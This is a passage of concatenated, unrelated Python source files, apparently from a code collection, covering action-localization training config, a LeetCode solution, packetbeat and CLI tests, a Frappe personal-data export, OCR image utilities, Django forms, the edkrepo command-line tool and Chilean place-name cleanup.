blackjack', 'Playing congas', 'Playing drums', 'Playing field hockey', 'Playing flauta', 'Playing guitarra', 'Playing harmonica', 'Playing ice hockey', 'Playing kickball', 'Playing lacrosse', 'Playing piano', 'Playing polo', 'Playing pool', 'Playing racquetball', 'Playing rubik cube', 'Playing saxophone', 'Playing squash', 'Playing ten pins', 'Playing violin', 'Playing water polo', 'Pole vault', 'Polishing forniture', 'Polishing shoes', 'Powerbocking', 'Preparing pasta', 'Preparing salad', 'Putting in contact lenses', 'Putting on makeup', 'Putting on shoes', 'Rafting', 'Raking leaves', 'Removing 
curlers', 'Removing ice from car', 'Riding bumper cars', 'River tubing', 'Rock climbing', 'Rock-paper-scissors', 'Rollerblading', 'Roof shingle removal', 'Rope skipping', 'Running a marathon', 'Sailing', 'Scuba diving', 'Sharpening knives', 'Shaving', 'Shaving legs', 'Shot put', 'Shoveling snow', 'Shuffleboard', 'Skateboarding', 'Skiing', 'Slacklining', 'Smoking a cigarette', 'Smoking hookah', 'Snatch', 'Snow tubing', 'Snowboarding', 'Spinning', 'Spread mulch','Springboard diving', 'Starting a campfire', 'Sumo', 'Surfing', 'Swimming', 'Swinging at the playground', 'Table soccer','Tai chi', 'Tango', 'Tennis serve with ball bouncing', 'Throwing darts', 'Trimming branches or hedges', 'Triple jump', 'Tug of war', 'Tumbling', 'Using parallel bars', 'Using the balance beam', 'Using the monkey bar', 'Using the pommel horse', 'Using the rowing machine', 'Using uneven bars', 'Vacuuming floor', 'Volleyball', 'Wakeboarding', 'Walking the dog', 'Washing dishes', 'Washing face', 'Washing hands', 'Waterskiing', 'Waxing skis', 'Welding', 'Windsurfing', 'Wrapping presents', 'Zumba'] } _DATASET_HYPER_PARAMS = { "THUMOS":{ "dropout":0.7, "lr":1e-4, "weight_decay":5e-5, "frames_per_sec":25, "segment_frames_num":16, "sample_segments_num":750, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["THUMOS"]), "cls_threshold":0.25, "test_upgrade_scale":20, # "data_dir":"/DATA/W-TAL/THU14/", "data_dir":"./data/THUMOS14/", "test_gt_file":"./data/THUMOS14/gt.json", "tiou_thresholds":np.arange(0.1, 1.00, 0.10), "nms_thresh":0.55, "ins_topk_seg":8, "con_topk_seg":3, "bak_topk_seg":3, "loss_lamb_1":2e-3, "loss_lamb_2":5e-5, "loss_lamb_3":2e-4, }, "ActivityNet":{ "dropout":0.7, "lr":1e-4, "weight_decay":0.001, "frames_per_sec":25, "segment_frames_num":16, "sample_segments_num":75, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["ActivityNet"]), "cls_threshold":0.10, "test_upgrade_scale":20, "data_dir":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/features", # "data_dir":"/DATA/W-TAL/ActivityNet13/features", "test_gt_file":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/gt.json", "tiou_thresholds":np.arange(0.50, 1.00, 0.05), "nms_thresh":0.90, "ins_topk_seg":2, "con_topk_seg":10, "bak_topk_seg":10, "loss_lamb_1":5e-3, "loss_lamb_2":5e-5, "loss_lamb_3":0e-4, }, "HACS":{ "dropout":0.7, "lr":1e-4, "weight_decay":0.001, "frames_per_sec":25, "segment_frames_num":16, #number of frames clips as input "sample_segments_num":75, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["ActivityNet"]), "cls_threshold":0.10, "test_upgrade_scale":20, "data_dir":"/mnt/d/Dataset/hacs_segments_features_I3D/hacs_segments_features", # "data_dir":"/DATA/W-TAL/ActivityNet13/features", "test_gt_file":"/mnt/d/Dataset/hacs_segments_features_I3D/HACS_segments_v1.1.1.json", "tiou_thresholds":np.arange(0.50, 1.00, 0.05), "nms_thresh":0.90, "ins_topk_seg":2, "con_topk_seg":10, "bak_topk_seg":10, "loss_lamb_1":5e-3, "loss_lamb_2":5e-5, "loss_lamb_3":0e-4, }, "HACStoAct":{ "dropout":0.7, "lr":1e-4, "weight_decay":0.001, "frames_per_sec":25, "segment_frames_num":16, #number of frames clips as input "sample_segments_num":75, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["ActivityNet"]), "cls_threshold":0.10, "test_upgrade_scale":20, "src_data_dir":"/mnt/d/Dataset/hacs_segments_features_I3D/features", "src_test_gt_file":"/mnt/d/Dataset/hacs_segments_features_I3D/gt.json", "tgt_data_dir":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/features", "tgt_test_gt_file":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/gt.json", "tiou_thresholds":np.arange(0.50, 1.00, 0.05), 
"nms_thresh":0.90, "ins_topk_seg":2, "con_topk_seg":10, "bak_topk_seg":10, "loss_lamb_1":5e-3, "loss_lamb_2":5e-5, "loss_lamb_3":0e-4, "r_easy": 5, "r_hard": 20, "m" : 3, "M" : 6 }} def build_args(dataset=None): parser = argparse.ArgumentParser("This script is used for the weakly-supervised temporal aciton localization task.") parser.add_argument("--checkpoint", default=None, type=str) parser.add_argument("--start_epoch", default=0, type=int) parser.add_argument("--gpu", default='0', type=str) parser.add_argument("--num_workers", default=6, type=int) parser.add_argument("--dataset", default="THUMOS", type=str) parser.add_argument("--batch_size", default=16, type=int) parser.add_argument("--epochs", default=1000, type=int) parser.add_argument("--without_wandb", action="store_true") parser.add_argument("--test", action="store_true") args = parser.parse_args() if dataset is not None: args.dataset = dataset # Based on the selected dataset, we set dataset specific hyper-params. if args.dataset == "HACStoAct": args.class_name_lst = _CLASS_NAME['ActivityNet'] else: args.class_name_lst = _CLASS_NAME[args.dataset] args.action_cls_num = _DATASET_HYPER_PARAMS[args.dataset]["action_cls_num"] args.dropout = _DATASET_HYPER_PARAMS[args.dataset]["dropout"] args.lr = _DATASET_HYPER_PARAMS[args.dataset]["lr"] args.weight_decay = _DATASET_HYPER_PARAMS[args.dataset]["weight_decay"] args.frames_per_sec = _DATASET_HYPER_PARAMS[args.dataset]["frames_per_sec"] args.segment_frames_num = _DATASET_HYPER_PARAMS[args.dataset]["segment_frames_num"] args.sample_segments_num = _DATASET_HYPER_PARAMS[args.dataset]["sample_segments_num"] args.feature_dim = _DATASET_HYPER_PARAMS[args.dataset]["feature_dim"] args.cls_threshold = _DATASET_HYPER_PARAMS[args.dataset]["cls_threshold"] args.tiou_thresholds = _DATASET_HYPER_PARAMS[args.dataset]["tiou_thresholds"] #args.test_gt_file_path = _DATASET_HYPER_PARAMS[args.dataset]["test_gt_file"] args.src_test_gt_file_path = _DATASET_HYPER_PARAMS[args.dataset]["src_test_gt_file"] args.tgt_test_gt_file_path = _DATASET_HYPER_PARAMS[args.dataset]["tgt_test_gt_file"] #args.data_dir = _DATASET_HYPER_PARAMS[args.dataset]["data_dir"] args.src_data_dir = _DATASET_HYPER_PARAMS[args.dataset]["src_data_dir"] args.tgt_data_dir = _DATASET_HYPER_PARAMS[args.dataset]["tgt_data_dir"] args.test_upgrade_scale = _DATASET_HYPER_PARAMS[args.dataset]["test_upgrade_scale"] args.nms_thresh = _DATASET_HYPER_PARAMS[args.dataset]["nms_thresh"] args.ins_topk_seg = _DATASET_HYPER_PARAMS[args.dataset]["ins_topk_seg"] args.con_topk_seg = _DATASET_HYPER_PARAMS[args.dataset]["con_topk_seg"] args.bak_topk_seg = _DATASET_HYPER_PARAMS[args.dataset]["bak_topk_seg"] args.loss_lamb_1 = _DATASET_HYPER_PARAMS[args.dataset]["loss_lamb_1"] args.loss_lamb_2 = _DATASET_HYPER_PARAMS[args.dataset]["loss_lamb_2"] args.loss_lamb_3 = _DATASET_HYPER_PARAMS[args.dataset]["loss_lamb_3"] args.r_easy = _DATASET_HYPER_PARAMS[args.dataset]["r_easy"] args.r_hard = _DATASET_HYPER_PARAMS[args.dataset]["r_hard"] args.m = _DATASET_HYPER_PARAMS[args.dataset]["m"] args.M = _DATASET_HYPER_PARAMS[args.dataset]["M"] return args<reponame>kyhau/aws-lambdas<gh_stars>0 def test_nothing(): assert 2+2==2*2<filename>LeetCode/python3/946.py class Solution: def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool: res = [] i, n = 0, len(popped) for p in pushed: res.append(p) while res and i < n and res[-1] == popped[i]: i += 1 res.pop() return i == n<gh_stars>1000+ from packetbeat import BaseTest """ Tests that the negotiation phase at the 
beginning of a mysql connection doesn't leave the parser in a broken state. """ class Test(BaseTest): def test_connection_phase(self): """ This tests that requests are still captured from a mysql stream that starts with the "connection phase" negotiation. """ self.render_config_template( mysql_ports=[3306], ) self.run_packetbeat(pcap="mysql_connection.pcap") objs = self.read_output() assert len(objs) == 1 assert objs[0]['query'] == 'SELECT DATABASE()' # -*- coding: utf-8 -*- # Copyright (c) 2019, Frappe Technologies and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe import json from frappe import _ from frappe.model.document import Document from frappe.utils.verified_command import get_signed_params class PersonalDataDownloadRequest(Document): def after_insert(self): personal_data = get_user_data(self.user) self.generate_file_and_send_mail(personal_data) def generate_file_and_send_mail(self, personal_data): """generate the file link for download""" user_name = self.user_name.replace(' ','-') f = frappe.get_doc({ 'doctype': 'File', 'file_name': 'Personal-Data-'+user_name+'-'+self.name+'.json', "attached_to_doctype": 'Personal Data Download Request', "attached_to_name": self.name, 'content': str(personal_data), 'is_private': 1 }) f.save(ignore_permissions=True) file_link = frappe.utils.get_url("/api/method/frappe.core.doctype.file.file.download_file") +\ "?" + get_signed_params({"file_url": f.file_url}) host_name = frappe.local.site frappe.sendmail( recipients=self.user, subject=_("Download Your Data"), template="download_data", args={ 'user': self.user, 'user_name': self.user_name, 'link': file_link, 'host_name': host_name }, header=[_("Download Your Data"), "green"] ) def get_user_data(user): """ returns user data not linked to User doctype """ hooks = frappe.get_hooks("user_privacy_documents") data = {} for hook in hooks: d = data.get(hook.get('doctype'),[]) d += frappe.get_all(hook.get('doctype'), {hook.get('match_field'): user}, ["*"]) if d: data.update({ hook.get('doctype'):d }) return json.dumps(data, indent=2, default=str)def create_adjacency_matrix(vec_num, edges, directed=True): matrix = [] if directed: for i in range(vec_num): matrix.append([]) for j in range(vec_num): if [i, j] in edges: matrix[i].append(1) else: matrix[i].append(0) else: for i in range(vec_num): matrix.append([]) for j in range(vec_num): matrix[i].append(0) for edge in edges: x = edge[0] y = edge[1] matrix[x][y] = 1 matrix[y][x] = 1 return matrix def create_incidence_matrix(vec_num, edges, directed=True): matrix = [] if directed: for i in range(vec_num): matrix.append([]) for j in range(len(edges)): if i == edges[j][0]: matrix[i].append(1) elif i == edges[j][1]: matrix[i].append(-1) else: matrix[i].append(0) else: for i in range(vec_num): matrix.append([]) for j in range(len(edges)): if i == edges[j][0] or i == edges[j][1]: matrix[i].append(1) else: matrix[i].append(0) return matrix def create_adjacency_list(vec_num, edges, directed=True): matrix = [] if directed: print("directed") for i in range(vec_num): matrix.append([]) for edge in edges: if i == edge[0]: matrix[i].append(edge[1]) else: print("undirected") for i in range(vec_num): matrix.append([]) for edge in edges: if i == edge[0]: matrix[i].append(edge[1]) elif i == edge[1]: matrix[i].append(edge[0]) return matrix """ Orlov Plugins : Picture Utility. 
""" import os import logging try: import cv2 import numpy as np import pyocr import pyocr.builders from PIL import Image except ModuleNotFoundError as e: print(str(e)) from orlov.exception import PictureError, OcrError PMC_THRESHOLD = 0.96 L = logging.getLogger(__name__) class POINT(object): """ PatternMatch Point Object. Attributes: x(int): Start Point X position. y(int): Start Point Y position. width(int): Target Image Width. height(int): Target Image Height. """ def __init__(self, x, y, width, height): self.x = x self.y = y self.width = width self.height = height def __repr__(self) -> str: return 'POINT()' def __str__(self) -> str: return '(X, Y) = (%s, %s), Width = %s, Height = %s' \ % (self.x, self.y, self.width, self.height) # pylint: disable=E1101 class Picture(object): """ Picture Module. """ @classmethod def exists(cls, filename): """ picture file exists. Arguments: filename(str): picture filename. Raises: PictureError: file not founds. Returns: exists(bool): file exist or not. """ if os.path.exists(filename): return True else: L.warning('%s is not exists.', filename) raise PictureError('%s is not exists.' % filename) @classmethod def open(cls, filename): """ picture file open. Arguments: filename(str): picture filename. Raises: PictureError: 1). file not founds. 2). file not opens. Returns: image(PIL.Image): opened PIL Image Object. """ if cls.exists(filename): try: return Image.open(filename, 'r') except IOError as e: L.warning('I/O Error %s', str(e)) raise PictureError('it is not success of loading picture %s' % filename) @classmethod def save(cls, pic, filepath, q=100, opt=True): """ picture file save. Arguments: pic(PIL.Image): PIL Image Object. filepath(str): Save Target Path. q(int): Save Quality. opt(bool): Save Optimized. Raises: PictureError: Could not find target parent directory. Returns: filepath(str): Save Target FilePath. """ #cls.exists(filepath) if not os.path.exists(os.path.dirname(filepath)): raise PictureError('it is not exists parents directory. : %s' % os.path.dirname(filepath)) pic.save(filepath, quality=q, optimize=opt) return filepath @classmethod def to_opencv(cls, pic): """ Exchanged PIL.Image to OpenCV Image. Arguments: pic(PIL.Image): PIL Image Object. Raises: PictureError: PIL.Images is None. Returns: data(numpy.ndarray): OpenCV Image Data. """ if pic is None: raise PictureError('it is not create opencv_pic.') return np.asarray(pic) @classmethod def to_pil(cls, opencv_pic): """ Exchanged OpenCV Image to PIL.Image. Arguments: opencv_pic(numpy.ndarray): OpenCV Image Data. Raises: PictureError: Not Excnahged Picture. Returns: data(PIL.Image): PIL.Images. """ try: return Image.fromarray(opencv_pic) except Exception as e: L.warning(str(e)) raise PictureError('it is not exchange pic.') @classmethod def resize(cls, pic, size): """ Resized Picture. Arguments: pic(PIL.Image): PIL.Image. size(str): resize resolution. only 240P, 360P, 480P, 720P, 1080P. Returns: image(PIL.Image): opened PIL Image Object. """ sz = 240 if size == '240P': sz = 240 elif size == '360P': sz = 360 elif size == '480P': sz = 480 elif size == '720P': sz = 720 elif size == '1080P': sz = 1080 else: return None #L.info("Base : %s" % str(pic.size)) width = float((float(pic.size[0]) * sz)) / float(pic.size[1]) res = (int(width), sz) #L.info("Resize : %s" % str(res)) return pic.resize(res) @classmethod def _patternmatch(cls, reference, target, box=None): """ PatternMatch Base Method. Arguments: reference(str): Reference Picture FilePath. target(str): Target Picture FilePath. 
box(tuple): restrict target box. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: result(box): Pattern Match Result. reference(str): reference filepath. """ if not os.path.exists(reference): raise PictureError('it is not exists reference file. : %s' % reference) if not os.path.exists(target): raise PictureError('it is not exists target file. : %s' % target) reference_cv = cv2.imread(reference) target_cv = cv2.imread(target, 0) return cls.__patternmatch(reference_cv, target_cv, box) @classmethod def __patternmatch(cls, reference, target, box=None, tmp=None): """ PatternMatch Base Method. Arguments: reference(str): Reference Picture FilePath. target(str): Target Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: result(box): Pattern Match Result. reference(str): reference filepath. """ if len(reference.shape) == 3: height, width, _ = reference.shape[:3] else: height, width = reference.shape[:2] if box is None: box = POINT(0, 0, width, height) cv2.rectangle(reference, (box.x, box.y), (box.x + box.width, box.y + box.height), (0, 255, 0), 5) img_gray = cv2.cvtColor(reference, cv2.COLOR_BGR2GRAY) img_gray = img_gray[box.y:(box.y + box.height), box.x:(box.x + box.width)] if tmp: cv2.imwrite(os.path.join(tmp, 'crop.png'), img_gray) template = target w, h = template.shape[::-1] res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED) loc = np.where(res >= PMC_THRESHOLD) result = None for pt in zip(*loc[::-1]): x = pt[0] + box.x y = pt[1] + box.y result = POINT(x, y, w, h) cv2.rectangle(reference, (x, y), (x + w, y + h), (0, 0, 255), 5) return result, reference @classmethod def search_pattern(cls, reference, target, box=None, tmp=None): """ PatternMatch Method. Arguments: reference(str): Reference Picture FilePath. target(str): Target Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: result(box): Pattern Match Result. reference(str): reference filepath. """ if not os.path.exists(target): raise PictureError('it is not exists target file. : %s' % target) target_cv = cv2.imread(target, 0) return cls.__patternmatch(reference, target_cv, box, tmp) class Singleton(type): """ Singleton meta-class """ _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] # pylint: disable=E1101 class Ocr(object): """ OCR Module """ @classmethod def __tool_initialize(cls): tools = pyocr.get_available_tools() if not tools: raise OcrError('No OCR tool found.') return tools[0] @classmethod def __language_initialize(cls, tool): L.info('Will use tool "%s"', (tool.get_name())) langs = tool.get_available_languages() L.info('Available languages: %s', ', '.join(langs)) lang = langs[0] L.info('Will use lang "%s"', lang) return lang @classmethod def __img_to_string(cls, reference, box=None, tmp=None, _lang='eng'): """ OCR Image to String Method. Arguments: reference(str): Reference Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. _lang(str): ocr base languages. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: txt(str): Search Text. reference(str): reference filepath. 
""" if len(reference.shape) == 3: height, width, _ = reference.shape[:3] else: height, width = reference.shape[:2] if not box: box = POINT(0, 0, width, height) cv2.rectangle(reference, (box.x, box.y), (box.x + box.width, box.y + box.height), (255, 0, 0), 5) img_gray = cv2.cvtColor(reference, cv2.COLOR_BGR2GRAY) img_gray = img_gray[box.y:(box.y + box.height), box.x:(box.x + box.width)] if tmp: cv2.imwrite(os.path.join(tmp, 'crop_ocr.png'), img_gray) txt = cls.__tool_initialize().image_to_string( Picture.to_pil(img_gray), lang=_lang, builder=pyocr.builders.TextBuilder(tesseract_layout=6)) return txt, reference @classmethod def img_to_string(cls, reference, box=None, tmp=None, _lang='eng'): """ OCR Image to String Method. Arguments: reference(str): Reference Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. _lang(str): ocr base languages. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: txt(str): Search Text. reference(str): reference filepath. """ txt, _ = cls.__img_to_string(reference, box, tmp, _lang) L.debug('Get Text -> %s', txt) return txt, reference @classmethod def file_to_string(cls, filename, box=None, tmp=None, _lang='eng'): """ OCR File to String Method. Arguments: filename(str): Reference Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. _lang(str): ocr base languages. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: txt(str): Search Text. """ if not os.path.exists(filename): raise PictureError('it is not exists reference file. : %s' % filename) ref_cv = cv2.imread(filename) txt, _ = cls.__img_to_string(ref_cv, box, tmp, _lang) L.info('%s -> %s', filename, txt) return txt <reponame>jplusplus/feowl from django import forms from django.contrib.auth.forms import ReadOnlyPasswordHashField from django.utils.translation import ugettext_lazy as _ from models import PowerReport, Device, Contributor, Area class ContributorAdminForm(forms.ModelForm): name = forms.RegexField( label=_("Name"), max_length=30, regex=r"^[\w.@+-]+$", help_text=_("Required. 30 characters or fewer. Letters, digits and " "@/./+/-/_ only."), error_messages={ 'invalid': _("This value may contain only letters, numbers and " "@/./+/-/_ characters.")}) password = ReadOnlyPasswordHashField(label=_("Password"), help_text=_("Raw passwords are not stored, so there is no way to see " "this user's password, but you can change the password " "using <a href=\"password/\">this form</a>.")) def clean_password(self): return self.initial["password"] class Meta: model = Contributor class ContributorForm(forms.ModelForm): class Meta: model = Contributor class PowerReportForm(forms.ModelForm): class Meta: model = PowerReport def clean_duration(self): duration = self.cleaned_data['duration'] #ensure that duration is a positive number (PositiveInteger fields can be == 0) if duration == 0: raise forms.ValidationError('Duration values must be larger than 0.') return duration class DeviceForm(forms.ModelForm): class Meta: model = Device class AreaForm(forms.ModelForm): class Meta: model = Area #!/usr/bin/env python3 # ## @file # edkrepo_cli.py # # Copyright (c) 2017 - 2020, Intel Corporation. 
All rights reserved.<BR> # SPDX-License-Identifier: BSD-2-Clause-Patent # import argparse from operator import itemgetter import sys import traceback import pkg_resources import time import json import os import subprocess import site import inspect import importlib.util import datetime as dt from git.exc import GitCommandError from edkrepo.commands import command_factory from edkrepo.config import config_factory from edkrepo.common.edkrepo_exception import EdkrepoException, EdkrepoGlobalConfigNotFoundException from edkrepo.common.edkrepo_exception import EdkrepoWarningException from edkrepo.common.edkrepo_exception import EdkrepoConfigFileInvalidException from edkrepo.common.humble import KEYBOARD_INTERRUPT, GIT_CMD_ERROR from edkrepo.common.pathfix import get_actual_path def generate_command_line(command): parser = argparse.ArgumentParser() subparsers = parser.add_subparsers(dest='subparser_name') try: version = pkg_resources.get_distribution("edkrepo").version parser.add_argument("--version", action="version", version="%(prog)s {0}".format(version)) except: #To prevent errors if edkrepo is being run without being installed parser.add_argument("--version", action="version", version="%(prog)s 0.0.0") #command_names = command.command_list() for command_name in command.command_list(): subparser_name = 'parser_' + command_name command_name_metadata = command.get_metadata(command_name) if 'alias' in command_name_metadata: subparser_name = subparsers.add_parser(command_name, aliases=[command_name_metadata['alias']], help=command_name_metadata['help-text'], description=command_name_metadata['help-text'], formatter_class=argparse.RawTextHelpFormatter) else: subparser_name = subparsers.add_parser(command_name, help=command_name_metadata['help-text'], description=command_name_metadata['help-text'], formatter_class=argparse.RawTextHelpFormatter) #break arg list up into positional and non-positional arg lists positional_args = [] non_positional_args = [] choice_args = [] for arg in command_name_metadata['arguments']: if arg.get('positional'): positional_args.append(arg) elif arg.get('choice'): choice_args.append(arg) else: non_positional_args.append(arg) #if there are more than 1 positional args sort them by position and add to the subparser if positional_args != [] and len(positional_args) > 1: positional_args = sorted(positional_args, key=itemgetter('position')) #add positional args for arg in positional_args: #check for choices if arg.get('choices'): choices = [] help_text = arg.get('help-text') for choice in choice_args: if choice.get('parent') == arg.get('name'): choices.append(choice.get('choice')) help_text += '\n' + choice.get('help-text') subparser_name.add_argument(arg.get('name'), choices=choices, help=help_text) #check if non-required positional elif not arg.get('required'): subparser_name.add_argument(arg.get('name'), nargs='?', help=arg.get('help-text')) else: subparser_name.add_argument(arg.get('name'), help=arg.get('help-text')) #add non-positional args for arg in non_positional_args: if 'action' in arg: arg_action = arg.get('action') else: arg_action = 'store_true' if 'short-name' in arg: short_name = '-' + arg['short-name'] subparser_name.add_argument(short_name, ('--' + arg.get('name')), action=arg_action, help=arg.get('help-text')) if 'nargs' in arg: subparser_name.add_argument(short_name, ('--' + arg.get('name')), action=arg_action, nargs=arg.get('nargs'), help=arg.get('help-text')) elif 'nargs' in arg: subparser_name.add_argument(('--' + arg.get('name')), action=arg_action, 
nargs=arg.get('nargs'), help=arg.get('help-text')) else: subparser_name.add_argument(('--' + arg.get('name')), action=arg_action, help=arg.get('help-text')) return parser command_completion_script_header='''#!/usr/bin/env bash # ## @file edkrepo_completions.sh # # Automatically generated please DO NOT modify !!! # ''' def generate_command_completion_script(script_filename, parser): import edkrepo.command_completion_edkrepo as completion commands = [] for action in parser._positionals._group_actions: if action.choices is not None: commands = [c for c in action.choices] break commands = sorted(commands) commands_with_3rd_param_completion = [c for c in completion.command_completions if c in commands] commands_with_3rd_param_completion = sorted(commands_with_3rd_param_completion) with open(script_filename, 'w') as f: f.write(command_completion_script_header) if sys.platform == "win32": command_completion_path = os.path.dirname(sys.executable) command_completion_path = os.path.join(command_completion_path, 'Scripts', "command_completion_edkrepo.exe") if not os.path.isfile(command_completion_path): print('command_completion_edkrepo.exe not found') return command_completion_path = get_actual_path(command_completion_path) (drive, path) = os.path.splitdrive(command_completion_path) command_completion_path = '/{}{}'.format(drive.replace(':','').lower(), path.replace('\\','/')) f.write("export command_completion_edkrepo_file='{}'\n".format(command_completion_path)) f.write('alias command_completion_edkrepo="$command_completion_edkrepo_file"\n') f.write('_edkrepo_completions() {\n if [ "${#COMP_WORDS[@]}" -eq "2" ]; then\n') f.write(' COMPREPLY=($(compgen -W "{}" -- "${{COMP_WORDS[1]}}"))\n'.format(' '.join(commands))) if len(commands_with_3rd_param_completion) > 0: f.write(' elif [ "${#COMP_WORDS[@]}" -eq "3" ]; then\n') first_loop = True for command in commands_with_3rd_param_completion: if first_loop: f.write(' if [ "${{COMP_WORDS[1]}}" == "{}" ]; then\n'.format(command)) first_loop = False else: f.write(' elif [ "${{COMP_WORDS[1]}}" == "{}" ]; then\n'.format(command)) f.write(' COMPREPLY=($(compgen -W "$(command_completion_edkrepo ${COMP_WORDS[1]})" -- "${COMP_WORDS[2]}"))\n') if len(commands_with_3rd_param_completion) > 0: f.write(' fi\n') f.write(' fi\n}\n\n') if len(commands_with_3rd_param_completion) > 0: if sys.platform == "win32": f.write('if [ -x "$(command -v edkrepo)" ] && [ -x "$(command -v $command_completion_edkrepo_file)" ]; then\n') else: f.write('if [ -x "$(command -v edkrepo)" ] && [ -x "$(command -v command_completion_edkrepo)" ]; then\n') else: f.write('if [ -x "$(command -v edkrepo)" ]; then\n') f.write(' complete -F _edkrepo_completions edkrepo\nfi\n') def main(): start_time = dt.datetime.now() command = command_factory.create_composite_command() config = {} try: config["cfg_file"] = config_factory.GlobalConfig() config["user_cfg_file"] = config_factory.GlobalUserConfig() except EdkrepoGlobalConfigNotFoundException as e: print("Error: {}".format(str(e))) return e.exit_code except EdkrepoConfigFileInvalidException as e: print("Error: {}".format(str(e))) return e.exit_code parser = generate_command_line(command) if len(sys.argv) <= 1: parser.print_help() return 1 if sys.argv[1] == 'generate-command-completion-script' and len(sys.argv) >= 3: generate_command_completion_script(sys.argv[2], parser) return 0 parsed_args = parser.parse_args() command_name = parsed_args.subparser_name try: command.run_command(command_name, parsed_args, config) except EdkrepoWarningException as e: 
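# Reviewer note (not part of the original source): each handler below follows the
# same convention -- print a human-readable message, then return the exception's
# exit code (e.exit_code for edkrepo exceptions, e.status for GitCommandError,
# 1 for KeyboardInterrupt and unexpected errors) so the shell gets a meaningful
# status from sys.exit(main()).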
print("Warning: {}".format(str(e))) return e.exit_code except EdkrepoException as e: if parsed_args.verbose: traceback.print_exc() print("Error: {}".format(str(e))) return e.exit_code except GitCommandError as e: if parsed_args.verbose: traceback.print_exc() out_str = '' out_str = ' '.join(e.command) print(GIT_CMD_ERROR.format(out_str)) print(e.stdout.strip()) print(e.stderr.strip()) return e.status except KeyboardInterrupt: if parsed_args.verbose: traceback.print_exc() print(KEYBOARD_INTERRUPT) return 1 except Exception as e: if parsed_args.verbose: traceback.print_exc() print("Error: {}".format(str(e))) return 1 if parsed_args.performance: print('\nExecution Time: {}'.format(dt.datetime.now() - start_time)) return 0 if __name__ == "__main__": try: sys.exit(main()) except Exception as e: traceback.print_exc() sys.exit(1) import pandas as pd import numpy as np import unidecode comunas = pd.read_csv('./data/comuna.csv') comunas_name = np.array([unidecode.unidecode(x).lower() for x in comunas['name'].to_numpy()],dtype=str) comunas_id = np.array(comunas['id'].to_numpy(), dtype=int) comuna_code = dict(zip(comunas_name, comunas_id)) comunas_fix = { 'isla de pascua': 'isla de pascua', 'trehuaco' : 'treguaco', 'coccepcion' : 'concepcion', 'conce' : 'concepcion', 'concepcion.' : 'concepcion', 'santiago centro' : 'santiago', 'caleta tortel' : 'tortel', 'puente' : 'puente alto', 'san vicente de tagua tagua' : 'san vicente', 'san vicente tagua tagua' : 'san vicente', 'marchigue' : 'marchihue', 'coihaique' : 'coyhaique', 'coyihaque' : 'coyhaique', 'haulpen' : 'hualpen', 'vina': 'vina del mar', 'la serena': 'la serena', 'huechurabs' : 'huechuraba', 'providenica' : 'providencia', 'providenca' : 'providencia', 'cowuimbo' : 'coquimbo', 'comuna de putre' : 'putre', 'x region, chile' : 'nr', 'v region' : 'nr', 'alto hospicii' : 'alto hospicio', 'san miguel.' : 'san miguel', 'pozo amonte' : 'pozo almonte', 'til til' : 'tiltil', 'qta normal' : 'quinta normal', 'quinta norma' : 'quinta normal', 'milina' : 'molina', 'batuco' : 'lampa', 'la visterna' : 'la cisterna', '"puerto montt' : 'puerto montt', 'extranjero' : 'nr', 'cerrillos.' : 'cerrillos', 'maipu (mientras)..' : 'maipu', 'colchagua': 'nr', 'san antonio comuna de cartagena': 'cartagena', 'quemchi chiloe-' : 'quemchi', 'rocas de santo domingo' : 'santo domingo', 'la calera' : 'calera', 'coyhique' : 'coyhaique', 'cancun' : 'nr', 'estados unidos' : 'nr', 'gladstone' : 'nr', 'qjillota' : 'quillota', 'pac' : 'pedro aguirre cerda', 'paihuano' : 'paiguano', 'puerto aysen' : 'aysen', 'provincia' : 'nr', 'santioago' : 'santiago', 'quilpue (belloto)' : 'quilpue', 'nan' : 'nr' } def get_comunas_id(x, col): try: x[col] = comuna_code[x[col]] except KeyError: x[col] = comuna_code['nr'] return x def fix_location_online(x): if pd.isna(x['Comuna']): if pd.isna(x['Comuna.1']): x['Comuna'] = '' else: x['Comuna'] = x['Comuna.1'] try: x['Comuna'] = comuna_code[unidecode.unidecode(x['Comuna']).lower()] except KeyError: x['Comuna'] = comuna_code[comunas_fix[unidecode.unidecode(x['Comuna']).lower()]] return x def fix_location(x): if x['comuna'] == 'nr': x['comuna'] = 1 if pd.isna(x['comuna']): x['comuna'] = 1 return x import pytest from subprocess import call import os import yaml """ test metafunc this test will test metafunc. this test will also show how to run tests where failure is expected (i.e., checking that we handle invalid parameters). 
""" class TestCLI: """ simple metafunc test class This uses the subprocess PIPE var to capture system input and output, since we are running metafunc from the command line directly using subprocess. """ @classmethod def setup_class(self): """ setup any state specific to the execution of the given class (which usually contains tests). """ def testSetup(self): """ test workflow """ command = ["metafunc", "setup", "-n", "test"] pwd = os.path.abspath(os.path.dirname(__file__)) rc = call(command, cwd=pwd) assert rc == 0 @pytest.mark.parametrize( "test_input_config,expected", [("test/config.yaml", 0), ("config_wrong.yaml", 1)], ) def test_run(self, test_input_config, expected): """ test workflow """ command_prefix = ["metafunc", "run"] pwd = os.path.abspath(os.path.dirname(__file__)) command = command_prefix + [test_input_config] rc = call(command, cwd=pwd) assert rc == expected # clean up run dat # config files here specify a resultdir where the snakemake run results # will be written to. Here we find it for each indifivual run and delete # the directory after successful runs. config_data = yaml.safe_load(open(os.path.join(pwd, test_input_config))) 